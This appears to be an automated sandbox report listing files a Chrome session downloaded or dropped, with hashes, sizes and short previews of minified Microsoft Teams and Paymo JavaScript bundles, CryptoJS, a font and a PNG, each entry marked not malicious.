                                Preview:var SEe=Object.defineProperty;var _Ee=(qe,br,Pr)=>br in qe?SEe(qe,br,{enumerable:!0,configurable:!0,writable:!0,value:Pr}):qe[br]=Pr;var dC=(qe,br,Pr)=>(_Ee(qe,typeof br!="symbol"?br+"":br,Pr),Pr),vF=(qe,br,Pr)=>{if(!br.has(qe))throw TypeError("Cannot "+Pr)};var Ra=(qe,br,Pr)=>(vF(qe,br,"read from private field"),Pr?Pr.call(qe):br.get(qe)),Bh=(qe,br,Pr)=>{if(br.has(qe))throw TypeError("Cannot add the same private member more than once");br instanceof WeakSet?br.add(qe):br.set(qe,Pr)},Vi=(qe,br,Pr,x)=>(vF(qe,br,"write to private field"),x?x.call(qe,Pr):br.set(qe,Pr),Pr);var fC=(qe,br,Pr,x)=>({set _(p){Vi(qe,br,p,Pr)},get _(){return Ra(qe,br,x)}});System.register(["react","@paymo/shared-components","@paymo/ui-state","react-dom","@paymo/translation","@paymo/company-settings-data","@paymo/event-bus","@paymo/paymo-icons","@paymo/message-boxes"],function(qe,br){"use strict";var Pr,x,p,pC,Jr,hC,Yl,Zl,mC,zh,yr,ie,yt,oe,vi,dt,gC,Pn,Uh,Sr,Hh,Ln,vC,Vh,bC,yC,Is,qh,Yu,Ro,Wh,cn,Gh,Qh,Kh,Zu,CC,Xl,Jl,
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:PNG image data, 2 x 17, 8-bit/color RGB, non-interlaced
                                Category:dropped
                                Size (bytes):61
                                Entropy (8bit):4.035372245524405
                                Encrypted:false
                                SSDEEP:
                                MD5:5A0D3809CBEBAED109C1528E693CA2DD
                                SHA1:EB8EFC1B3750609FA27A2D4BFDC495C4D49CC65A
                                SHA-256:111789FF604F007CDF1A65048C84A8BA6CFB9013535C39361ED0E4C60DB8276C
                                SHA-512:D04A784A0ADE80F6AD00A4EE6E6DADE68D219E85E72CF71DE23DC7F974F9328A5EE23A0F5345B6D07E7514DB363A9763D403883DDB3F9A3D0CC700698FB1C00E
                                Malicious:false
                                Reputation:unknown
                                Preview:.PNG........IHDR.............x..F....IDAT.....$.....IEND.B`.
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with very long lines (27783)
                                Category:downloaded
                                Size (bytes):27891
                                Entropy (8bit):5.439202906104346
                                Encrypted:false
                                SSDEEP:
                                MD5:F1AA9D0B9892214B52C3AC52DF2C0DE7
                                SHA1:1E3E28897A2F8078CB3300D1CCA46B514BC0B2A9
                                SHA-256:B62E880D4D12C0CAD366CC04D9B81E6E1CAC198C00829C3AADF94634D2449368
                                SHA-512:BBCC11664D863D5992D5863FCA04BFB26C0ED5AB9AF7D6C1ED28ECBA6FA27C20DCC633DFFC5A593878A6190D154498CA28A2F05E70E4DD377A2111B947FC6A9F
                                Malicious:false
                                Reputation:unknown
                                URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/417548-aa8c7d7584ee7aca.js
                                Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[417548],{485202:(t,e)=>{"use strict";e.byteLength=function(t){var e=s(t),r=e[0],n=e[1];return 3*(r+n)/4-n},e.toByteArray=function(t){var e,r,i=s(t),f=i[0],u=i[1],h=new o(function(t,e,r){return 3*(e+r)/4-r}(0,f,u)),a=0,c=u>0?f-4:f;for(r=0;r<c;r+=4)e=n[t.charCodeAt(r)]<<18|n[t.charCodeAt(r+1)]<<12|n[t.charCodeAt(r+2)]<<6|n[t.charCodeAt(r+3)],h[a++]=e>>16&255,h[a++]=e>>8&255,h[a++]=255&e;2===u&&(e=n[t.charCodeAt(r)]<<2|n[t.charCodeAt(r+1)]>>4,h[a++]=255&e);1===u&&(e=n[t.charCodeAt(r)]<<10|n[t.charCodeAt(r+1)]<<4|n[t.charCodeAt(r+2)]>>2,h[a++]=e>>8&255,h[a++]=255&e);return h},e.fromByteArray=function(t){for(var e,n=t.length,o=n%3,i=[],f=16383,s=0,h=n-o;s<h;s+=f)i.push(u(t,s,s+f>h?h:s+f));1===o?(e=t[n-1],i.push(r[e>>2]+r[e<<4&63]+"==")):2===o&&(e=(t[n-2]<<8)+t[n-1],i.push(r[e>>10]+r[e>>4&63]+r[e<<2&63]+"="));return i.join("")};for(var r=[],n=[],o="undefined"!=typeof Uint8Array?Uint8Array:Array
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with very long lines (59564)
                                Category:dropped
                                Size (bytes):222444
                                Entropy (8bit):5.522253303440068
                                Encrypted:false
                                SSDEEP:
                                MD5:163584890BA5083D484995D3E145E14A
                                SHA1:D37CF8ED9225CF29FE9ADD3F8560DCEB56CD47B2
                                SHA-256:C4D6E6C6151C341D3738F08F3907BD567D26164D28AD13D635578835E47B73D0
                                SHA-512:479BD6C64504FD273433E0FC71A98118689A5963C6BCF8F1934CE5985AC814315AC0E4E39DF5A9566D5362D6BE473B10688BE2939A859E4D249AD1CBBA75E7A7
                                Malicious:false
                                Reputation:unknown
                                Preview:System.register(["@paymo/shared-components","@paymo/shared-libraries/apollo","react","@paymo/shared-libraries/lodash","@paymo/shared-libraries/form","@paymo/translation","@paymo/ui-state","@paymo/shared-libraries/hotkeys","@paymo/shared-libraries/yup","@paymo/paymo-icons","@paymo/company-settings-data","@paymo/shared-libraries/dnd-kit","@paymo/lists","@paymo/event-bus","@paymo/shared-libraries/apm"],(function(e,t){"use strict";var n,r,l,i,a,o,c,s,d,u,m,p,f,v,g,h,x,y,b,E,w,_,k,S,C,I,N,T,F,D,$,R,A,O,M,P,j,L,Z,z,q,V,B,U,H,W,G,X,K,Y,Q,J,ee,te,ne,re,le,ie,ae,oe,ce,se,de,ue,me,pe,fe,ve,ge,he,xe,ye,be,Ee,we,_e,ke,Se,Ce,Ie,Ne,Te,Fe,De,$e,Re,Ae,Oe,Me,Pe,je,Le,Ze,ze,qe,Ve,Be,Ue,He,We,Ge,Xe,Ke,Ye,Qe,Je,et,tt;return{setters:[e=>{n=e.Skeleton,r=e.styled,l=e.Tooltip,i=e.IconButton,a=e.SvgIcon,o=e.Typography,c=e.ClientContactTagInput,s=e.FormControlLabel,d=e.Checkbox,u=e.HelpIcon,m=e.TextEditor,p=e.Button,f=e.DialogTitle,v=e.DialogContent,g=e.DialogActions,h=e.Dialog,x=e.paperClasses,y=e.Switch,b=e.f
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with very long lines (40348)
                                Category:downloaded
                                Size (bytes):40455
                                Entropy (8bit):4.981394252256148
                                Encrypted:false
                                SSDEEP:
                                MD5:E36FE8288B6CC5FB216E1821E77BAD47
                                SHA1:0A718845E742538C25C859F2AD0CCB2E7AF4DE5F
                                SHA-256:9A01B2E8807963179A99AC8E6B5DA79A32CB33D9EE206B02EEA1893AC79FDA37
                                SHA-512:55234BA8402662D0B17512F33F7F84B6E04FB77B4E212BAB41B6D6941AB1AE98218766AB7532D362C61E3925E7B6C3DA1BCC853337046E9EFD97D2782E6D73C7
                                Malicious:false
                                Reputation:unknown
                                URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/52085-aa1e2134d5b41b9f.js
                                Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[52085],{848020:(e,t,a)=>{a.d(t,{aS:()=>i,a7:()=>n,as:()=>o,Mb:()=>r,el:()=>s,Av:()=>l,nb:()=>c,Jw:()=>m,hz:()=>d,gs:()=>g,p8:()=>p,cy:()=>u,O:()=>h});const i={Anonymous:"Anonymous",Aad:"Aad",Msa:"Msa",MsaLife:"MsaLife",GFed:"GFed",Otp:"Otp"},n={Member:"Member",Anonymous:"Anonymous",Guest:"Guest"},o={Default:"Default",Mto:"Mto",Ccm:"Ccm",Eotp:"Eotp"};var r;!function(e){e[e.Member=0]="Member",e[e.Guest=1]="Guest",e[e.Anonymous=2]="Anonymous",e[e.CrossCloudMeeting=3]="CrossCloudMeeting"}(r||(r={}));const s={prod:"prod",life:"life",dod:"dod",gcch:"gcch",gallatin:"gallatin",airgap08:"airgap08",airgap09:"airgap09"};var l,c,m,d,g,p,u,h;!function(e){e.prod="Global",e.gcch="microsoftonline.us",e.dod="microsoftonline.mil",e.gallatin="partner.microsoftonline.cn",e.gcc="gcc.microsoftonline.com",e.ag08="eaglex.ic.gov",e.ag09="microsoft.scloud"}(l||(l={})),function(e){e.prod="login.microso
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with very long lines (9937)
                                Category:dropped
                                Size (bytes):10044
                                Entropy (8bit):5.444279096330454
                                Encrypted:false
                                SSDEEP:
                                MD5:2B4C497D3F89CB23052BE40DA7B4FD82
                                SHA1:D55BEF6FB11CBB81BD08144BA1A61DD2EBFEB5E6
                                SHA-256:2DCCF9898681979FAB08FE15530549519F86519818E9154BFB74D4CC6F98B46E
                                SHA-512:06960A5C1F31359E13B29A988751A60C928D8CE2AC854B5B0F36B220EF49B449E27B17D1AE4835F8A47CB8ED9EA8C0DB86C5F67B7C304A62B3FB32B2404F2A7F
                                Malicious:false
                                Reputation:unknown
                                Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[57627],{184027:(e,t,r)=>{r.d(t,{q:()=>o});var n=r(513432),a=r(691505),o=function(e){var t,r=n.createContext({value:{current:e},version:{current:-1},listeners:[]});return r.Provider=(t=r.Provider,function(e){var r=n.useRef(e.value),o=n.useRef(0),s=n.useRef();return s.current||(s.current={value:r,version:o,listeners:[]}),(0,a.E)((function(){r.current=e.value,o.current+=1,(0,a.H)((function(){s.current.listeners.forEach((function(t){t([o.current,e.value])}))}))}),[e.value]),n.createElement(t,{value:s.current},e.children)}),delete r.Consumer,r}},963300:(e,t,r)=>{r.d(t,{F:()=>s});var n=r(513432),a=r(691505),o=r(783943);const s=(e,t)=>{const r=n.useContext(e),{value:{current:s},version:{current:c},listeners:l}=r,i={};Object.keys(t).forEach((e=>{i[e]=t[e](s)}));const[u,d]=n.useState([s,i]),m=e=>{d((r=>{if(!e)return[s,i];if(e[0]<=c){return Object.keys(t).every((e=>Object.is(r[1][e],i[
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with very long lines (65536), with no line terminators
                                Category:downloaded
                                Size (bytes):167639
                                Entropy (8bit):4.858684438148318
                                Encrypted:false
                                SSDEEP:
                                MD5:80956E886E915A4EC4DC2FFC3826775A
                                SHA1:A02B290EA4BF1CC8E7D75C41C45F378B6813ABCC
                                SHA-256:12E65ED053EB2AB71EFCEA5FF41648D64CB49AAD5CA7F1C806EFE33CD8B43048
                                SHA-512:9A6A13ACD652F0FC6744DEF36F8F736FCED5FAB3B818256C9015CA39E38C9D0E44AA3C16C8B281E4EC8259C5C715B98A90584013FDBA8AAC515B1F0F372795B1
                                Malicious:false
                                Reputation:unknown
                                URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/802756-ff6932200fc249b5.js
                                Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[802756],{802756:(e,t,a)=>{var o;function i(e={},t){return new Proxy(e,{get:(e,a)=>t?a in e?e[a]:t(String(a)):String(a)})}a.d(t,{SQ:()=>o,Cu:()=>n,BQ:()=>r}),function(e){e[e.Expanded=1]="Expanded",e[e.ExpandedAndPacked=2]="ExpandedAndPacked",e[e.Packed=3]="Packed"}(o||(o={}));const _=e=>e.replace(/[A-Z]/g,((e,t)=>0===t?e.toLowerCase():`_${e.toLowerCase()}`)),n=i({SliceSwitch:"activity_slice_switch",FeedListRendered:"feeds_focused_load",FeedListLoadNext:"feeds_focused_load_more",SlicesFeedListRendered:"slices_feeds_focused_load",SlicesFeedListLoadNext:"slices_feeds_focused_load_more",ActivityNameSpaceLoadScenario:"feeds_store_feed_item_namespace_load",AMSMemoryCachePrune:"ams_memory_cache_prune",GetAppPreviewResult:"ext_get_app_preview_result_appbasedlink",AppBasedLink:"ext_app_based_link",AppBasedLinkFetchAppDetails:"ext_app_based_link_fetch_app_details",AppBasedLinkChangedToo
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with very long lines (6098)
                                Category:downloaded
                                Size (bytes):7349
                                Entropy (8bit):5.313791708495746
                                Encrypted:false
                                SSDEEP:
                                MD5:78F769BD1DFCD0A39288496AD6071A8C
                                SHA1:A3022AA07713AD460D3748DF33DFE6CF841562EB
                                SHA-256:B330C6B763A663E9D74328EA71ABC6A0A5E7324D9AF69D671B61ABD328ECF884
                                SHA-512:DB0DE38D73F17ED87C9537F01263A7231B1C49848F23A50735A42F493CD59858C09CDBEFB3A652B901F2448F84008DC94FC5C484472584EBCF7ECACA073B1EF9
                                Malicious:false
                                Reputation:unknown
                                URL:https://static-spa.paymoapp.com/@paymo/shared-libraries/3.182.62/system/hotkeys.js
                                Preview:System.register(["react"],function(Z,Ce){"use strict";var x,I,w,B,j,D,N,L;return{setters:[l=>{x=l.default,I=l.useState,w=l.useRef,B=l.useCallback,j=l.useContext,D=l.useLayoutEffect,N=l.useEffect,L=l.createContext}],execute:function(){Z("useHotkeys",Ee);var l={};/*.object-assign.(c) Sindre Sorhus.@license MIT.*/var q=Object.getOwnPropertySymbols,ee=Object.prototype.hasOwnProperty,te=Object.prototype.propertyIsEnumerable;function re(e){if(e==null)throw new TypeError("Object.assign cannot be called with null or undefined");return Object(e)}function ne(){try{if(!Object.assign)return!1;var e=new String("abc");if(e[5]="de",Object.getOwnPropertyNames(e)[0]==="5")return!1;for(var t={},r=0;r<10;r++)t["_"+String.fromCharCode(r)]=r;var n=Object.getOwnPropertyNames(t).map(function(u){return t[u]});if(n.join("")!=="0123456789")return!1;var i={};return"abcdefghijklmnopqrst".split("").forEach(function(u){i[u]=u}),Object.keys(Object.assign({},i)).join("")==="abcdefghijklmnopqrst"}catch{return!1}}ne();
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with very long lines (48316), with no line terminators
                                Category:downloaded
                                Size (bytes):48316
                                Entropy (8bit):5.6346993394709
                                Encrypted:false
                                SSDEEP:
                                MD5:2CA03AD87885AB983541092B87ADB299
                                SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                Malicious:false
                                Reputation:unknown
                                URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js
                                Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with very long lines (9533)
                                Category:dropped
                                Size (bytes):108865
                                Entropy (8bit):5.369868627617769
                                Encrypted:false
                                SSDEEP:
                                MD5:02534F9440177BF95B4BAA54DC4D12B1
                                SHA1:3B5ED0A25E5BF7CFFAF93D6293191277E5466558
                                SHA-256:F4D87A262EFC6DF0F169A81568B81FF84BEEFBCC079B5709654644FFE5E5F5D8
                                SHA-512:3FFAC9850325BB85A8CFAF21D70A77DE06659C28BD26EB61FBBA222B54F987CAB47C0EC4A350764EE4A02ABB83D57A8DF1A499129DA218ADDDB98D4A2C54EDC2
                                Malicious:false
                                Reputation:unknown
                                Preview:System.register(["@paymo/shared-components","react","@paymo/shared-libraries/apollo","@paymo/translation","@paymo/event-bus","@paymo/shared-libraries/lodash","@paymo/company-settings-data","@paymo/shared-libraries/apm"],function(k,lr){"use strict";var ie,he,Ce,W,ke,we,De,L,fe,ue,Te,J,$e,N,I,o,C,S,b,P,de,ee,me,Ie,T,F,R,xe,Se,je,pe,Fe,Ae,Pe,_e,h,$,Re,Me,Ue,ne,We,qe,ze,Le,Be;return{setters:[x=>{ie=x.Box,he=x.CircularProgress,Ce=x.DialogTitle,W=x.clsx,ke=x.DialogContent,we=x.DialogActions,De=x.Button,L=x.styled,fe=x.Dialog,ue=x.buttonBaseClasses,Te=x.buttonClasses,J=x.formatTime,$e=x.Typography},x=>{N=x,I=x.useCallback,o=x.default,C=x.memo,S=x.useContext,b=x.useMemo,P=x.useEffect,de=x.createContext,ee=x.useState,me=x.useRef,Ie=x.Component},x=>{T=x.gql,F=x.useMutation,R=x.useQuery,xe=x.onError,Se=x.BatchHttpLink,je=x.setContext,pe=x.from,Fe=x.RetryLink,Ae=x.ApolloClient,Pe=x.InMemoryCache,_e=x.ApolloProvider},x=>{h=x.useTranslation,$=x.Trans,Re=x.withTranslation,Me=x.TranslationProvider},x=
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with very long lines (3274)
                                Category:downloaded
                                Size (bytes):10145
                                Entropy (8bit):5.330369240562562
                                Encrypted:false
                                SSDEEP:
                                MD5:924895C158531D0D02E35E3924CBE2ED
                                SHA1:49D569071C99353DBC813D23B1C78CE9832FD379
                                SHA-256:CAF1AA1159EF31B2B3506965750FB4F801B478F95F1336EFDDDC258A63E26D1E
                                SHA-512:AB78362A3C86E66787BD620D1FEEEC3B2476FC39744721A799C92886D97B4492369C926984F90040597573FA3CEA044AB94B93439D23227BAB6736FB3069395B
                                Malicious:false
                                Reputation:unknown
                                URL:https://static-spa.paymoapp.com/@paymo/company-settings-data/3.182.63/system/index.js
                                Preview:System.register(["@paymo/shared-libraries/lodash","@paymo/shared-libraries/apollo"],(function(e,r){"use strict";var n,a,t,s,i,o,c,u,l,d,m,p,y,v;return{setters:[e=>{n=e.memoize},e=>{a=e.InMemoryCache,t=e.HttpLink,s=e.setContext,i=e.from,o=e.createClient,c=e.GraphQLWsLink,u=e.RetryLink,l=e.getMainDefinition,d=e.makeVar,m=e.split,p=e.ApolloClient,y=e.gql,v=e.useReactiveVar}],execute:function(){let r=null;const g=e=>{if(r)return r;const n=new a({__typePolicies:{Viewer:{merge:(e,r,{mergeObjects:n})=>n(e,r)},User:{merge:(e,r,{mergeObjects:n})=>n(e,r)},Company:{merge:(e,r,{mergeObjects:n})=>n(e,r)},Currency:{merge:(e,r,{mergeObjects:n})=>n(e,r)}}});if(e){const r={ROOT_QUERY:{__typename:"Query",viewer:{__ref:`Viewer:${e.userSettings.id}`}},[`User:${e.userSettings.id}`]:{__typename:"User",company:{__ref:`Company:${e.companySettings.id}`},...e.userSettings},[`Viewer:${e.userSettings.id}`]:{__typename:"Viewer",id:e.userSettings.id,privileges:{...e.privileges,__typename:"CompanyPrivileges"},user:{
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with very long lines (61519)
                                Category:downloaded
                                Size (bytes):61625
                                Entropy (8bit):5.454418996166431
                                Encrypted:false
                                SSDEEP:
                                MD5:5509E16DAC095B6043858286190CB2B9
                                SHA1:45A642B6881F954038F49929D7FD2C5283FB68EE
                                SHA-256:3185557B3131838A753497C1557D544613CEB47D468B233905C139E5496F7B5D
                                SHA-512:C3A866A72C89614C6B8B97439B1DF2FC3DAEBB686B3464711FFAB8360CCDED2122722D2076A0C05EC8F71E448091CCDA3884A2489F6EBB0716EFC5B6AB767BF9
                                Malicious:false
                                Reputation:unknown
                                URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/2754-d1fd7c89df97899f.js
                                Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[2754],{719156:e=>{var t;!function(e){!function(e){!function(e){e[e.None=0]="None",e[e.Notified=1]="Notified",e[e.Connecting=2]="Connecting",e[e.Connected=3]="Connected",e[e.LocalHold=4]="LocalHold",e[e.RemoteHold=5]="RemoteHold",e[e.Disconnecting=6]="Disconnecting",e[e.Disconnected=7]="Disconnected",e[e.Observing=8]="Observing",e[e.EarlyMedia=9]="EarlyMedia",e[e.InLobby=10]="InLobby",e[e.Preheating=11]="Preheating",e[e.Preheated=12]="Preheated",e[e.Staging=13]="Staging",e[e.NegotiatingEncryption=14]="NegotiatingEncryption",e[e.NegotiatingEncryptionLobby=15]="NegotiatingEncryptionLobby"}(e.CallState||(e.CallState={})),function(e){e[e.Testing=0]="Testing",e[e.MicrosoftWNS=1]="MicrosoftWNS",e[e.MicrosoftWP7NS=2]="MicrosoftWP7NS",e[e.AppleAPN=3]="AppleAPN",e[e.GoogleAGCM=4]="GoogleAGCM",e[e.Hotmail=5]="Hotmail",e[e.GoogleAC2DM=6]="GoogleAC2DM",e[e.Trouter=7]="Trouter",e[e.Griffin=8]="Griffin"
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with very long lines (65479)
                                Category:downloaded
                                Size (bytes):359804
                                Entropy (8bit):5.928198594246381
                                Encrypted:false
                                SSDEEP:
                                MD5:D4BA442D6C0B9E9693F2FFE2EABF24E0
                                SHA1:51A4D9A30317D3E1FCD15F098CF0785EF03E2C83
                                SHA-256:2B06D408FDE428937B1BFC9B0AC6F71A145BD57D56448943E2D9D1B79DDE9C8F
                                SHA-512:46AC420E4C0F37146548C142487CB4C6FB360C8E20E11203670CDEDC8C1A511EAC0BC7806D645EA15587791220CDC55FF726CD7B01191CD5C9442CDDB496E3CD
                                Malicious:false
                                Reputation:unknown
                                URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/integrities-2b06d408fde428937b1b.js
                                Preview:window.__teamsSriHashes = window.__teamsSriHashes || {};.Object.assign(window.__teamsSriHashes, {"253":"sha256-dCHiqHHbT8C54v6xkfBWJOlN4qDwMFHJpfWkbDSMY1I=","304":"sha256-J//Ktvtf9gZAVrJEo4IyxFOJFdIX13HrYBsw84MKZjs=","450":"sha256-ouv3RNGdmdsmy9N5iMOstCZXhW6f6KuOHbHWbPY8IkI=","555":"sha256-1XCNZ4M/VA/Cs3u4YVBW4RmTc7HQPJ1SgO9LNZDEvIE=","563":"sha256-raXXuMyYmSWZXQPzD+XNeAE86PFRjd4Q9vy6YtqBGGw=","693":"sha256-GvVrL7uVpt/8Q8xZj30M05yu7H2cFyk2hnVodDeZuVE=","757":"sha256-eE44F4pLVlEYadEsrIZ4vjkJu3/kIBCnXE70c464NfM=","785":"sha256-ndUNLMoyh/yu1oaMRWfYYOdtJsBtzogJJGB2FT9Xw7w=","818":"sha256-HRQfl5qrrNxSihawrKVl6appBIRSNE+LwsvSW1bgLNc=","906":"sha256-L5gEiGP2s/6usJyzymx28/OI554GDHRFFoa1Zgz27xg=","1079":"sha256-AJb1brTr1NgAtonwrQ7awmQGy7xZxCmmPEjtbTEtBXQ=","1081":"sha256-U9E/bfXdmC09dlSnprdgfmChJBLjtwaHq0ObyMZNOnE=","1170":"sha256-JDhpHtZ6E4OzpC7AkARyf+KbMplq8nJfnZ64M4UwnSQ=","1214":"sha256-FIGgND7SkFJQs87te48T7KbVZ0x5hWUOQPRyJAWo5FU=","1258":"sha256-vZ+JBKqlmK8u03V/tfF86M7gAbjeFWbaZTfqTGaAquE=
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with very long lines (65536), with no line terminators
                                Category:dropped
                                Size (bytes):79350
                                Entropy (8bit):4.361667020708487
                                Encrypted:false
                                SSDEEP:
                                MD5:B4D415B263C182DB54F9262709BE4FD7
                                SHA1:6C659EC1CD040E16F6CFFB51BEC5EADD2599C6D1
                                SHA-256:50F0B4ADA66B0150FDD49F92EC770B29AD1D73A2CA0C62E0BD982C63F2CD447B
                                SHA-512:E0662D53C739252E0F4CF5743B610AE9AEB80CC69F6800F95B99426431C4932EDA8C6E0DD135DEB8C26F5F1B8E15005813AB0EBFE8EC96CE0368BDC1F9502BCF
                                Malicious:false
                                Reputation:unknown
                                Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[941359],{941359:(a,l,Z)=>{Z.d(l,{fSE:()=>h,TP9:()=>m,LSe:()=>e,v9w:()=>v,y2B:()=>M,cbT:()=>H,zb1:()=>V,nY7:()=>A,SXh:()=>i,Qi2:()=>L,xkB:()=>U,xHU:()=>r,wDt:()=>d,GqH:()=>g,ma3:()=>u,yKV:()=>t,EAE:()=>o,wIE:()=>F,F8W:()=>n,n_S:()=>R,ba$:()=>C,dMU:()=>s,ILi:()=>f,chi:()=>b,Aig:()=>p,EEN:()=>I,MLu:()=>O,mUJ:()=>k,xG7:()=>G,bio:()=>S,l8b:()=>N,B7m:()=>z,EMy:()=>E,kOy:()=>_,nYd:()=>w,bL$:()=>y,Q_I:()=>B,IMc:()=>D,OJr:()=>K,ipe:()=>P,h19:()=>T,XN6:()=>x,BYz:()=>Q,Bj:()=>Y,$RO:()=>X,Ftl:()=>j,fbj:()=>q,nKf:()=>J,TkK:()=>$,pO8:()=>W,Lin:()=>aa,nT:()=>la,oCE:()=>Za,K$r:()=>ca,M1Y:()=>ha,O0v:()=>ma,SH1:()=>ea,AqR:()=>va,Hzn:()=>Ma,t1F:()=>Ha,SrQ:()=>Va,a3S:()=>Aa,_Vr:()=>ia,QQo:()=>La,BBu:()=>Ua,Bul:()=>ra,uk7:()=>da,YFz:()=>ga,$jj:()=>ua,$4h:()=>ta,PHn:()=>oa,z4P:()=>Fa,N_H:()=>na,BFD:()=>Ra,YXI:()=>Ca,gTi:()=>sa,spK:()=>fa,wJr:()=>ba,sNG:()=>pa,gZ8:()=>Ia,B8A:()=>Oa,pLc:()=>ka,r43:(
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:Web Open Font Format (Version 2), TrueType, length 8000, version 1.0
                                Category:downloaded
                                Size (bytes):8000
                                Entropy (8bit):7.97130996744173
                                Encrypted:false
                                SSDEEP:
                                MD5:72993DDDF88A63E8F226656F7DE88E57
                                SHA1:179F97EC0275F09603A8DB94D4380EB584D81CD5
                                SHA-256:F4E80D9DFD374D02989B87A27B5ED4CB78FBB177C27F1478E9A8B0AFB7513149
                                SHA-512:7C20165F9D22A86341E841FD58526209017DCDE2AFE2D0D2A89FE853D95DC69F658D25CF798C71F452DAB09843FC808C1AE87A60B1284134163ABF5A1D93E50A
                                Malicious:false
                                Reputation:unknown
                                URL:https://fonts.gstatic.com/s/poppins/v22/pxiByp8kv8JHgFVrLEj6Z1xlFQ.woff2
                                Preview:wOF2.......@......?@.................................`..T..t.*..6..6.$..h. ..T.....1E.r.8...KD....*..2.>L.......0..c.h...y_)s...N..(._C,/.v...7B...Z..gT@....u*.\t.9....{.&.;<...j.2.H-...A.S......E..)..f.Y8vuw^.^_.n{.Z..U.h..Kcm.........E..........'.J.-.-.......=.."...E...../R.8P....>?.]...R..Ag:.Pt..j..s..pG. .!f?.Q.T.".O.....D.r......3>gJN!V.\.!....+.......X.B.v....c9.&iW-[.,.. ...Q.k%I.s.%...d...8q..._~.C.n".v0..6B.eT..?..7.....l....3..7...M...5......k......^.....F.v~|.....3N=.....[.!......}....F(...fA..c)0X$,FYL..=).(h<4...M5..<3.c....K/.{.p....3+'W...Z.[..;.w.....X....nx..v.(c;._.W......|.b.....{...9..A6...V|.N...Z?+|H/.#.W%.._.8,...>._..w...RP..-.?.k7X..".._S.3,J.........&.8Gs.?yH.Yx......I_....._o.0K......(e.Q.W....=...J.7.\k.n.pd.....s..%...sD......_..&-...(.7..6.U..&<~8...9......uV..|h.#m\.d./!....s.......b.j. ."...wX...B.`..Bj=......VnM....p..k.%..U.F..-VN).Y........_..W.p...B..|.j..f..7....).~....n......c.3....t.......s..>...
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with very long lines (65536), with no line terminators
                                Category:dropped
                                Size (bytes):117250
                                Entropy (8bit):5.162816607799181
                                Encrypted:false
                                SSDEEP:
                                MD5:B3031C4F76717B55FAC2255321C6DFA0
                                SHA1:1DFAC14C343D0FF7993C6A350F08EB23336D4A98
                                SHA-256:9450D8177F5466EB1DA5B163BC61851902E688B46D31C02723DD0AB5796770E6
                                SHA-512:26D84072A6825C4E7F4F2F607D8A9AB1057B6D778D801B59F24A7635DC525F0D3D0F672CE641F9D9C9CCD4DBB644E4AB62810D04399DF100774730356D0B2EE8
                                Malicious:false
                                Reputation:unknown
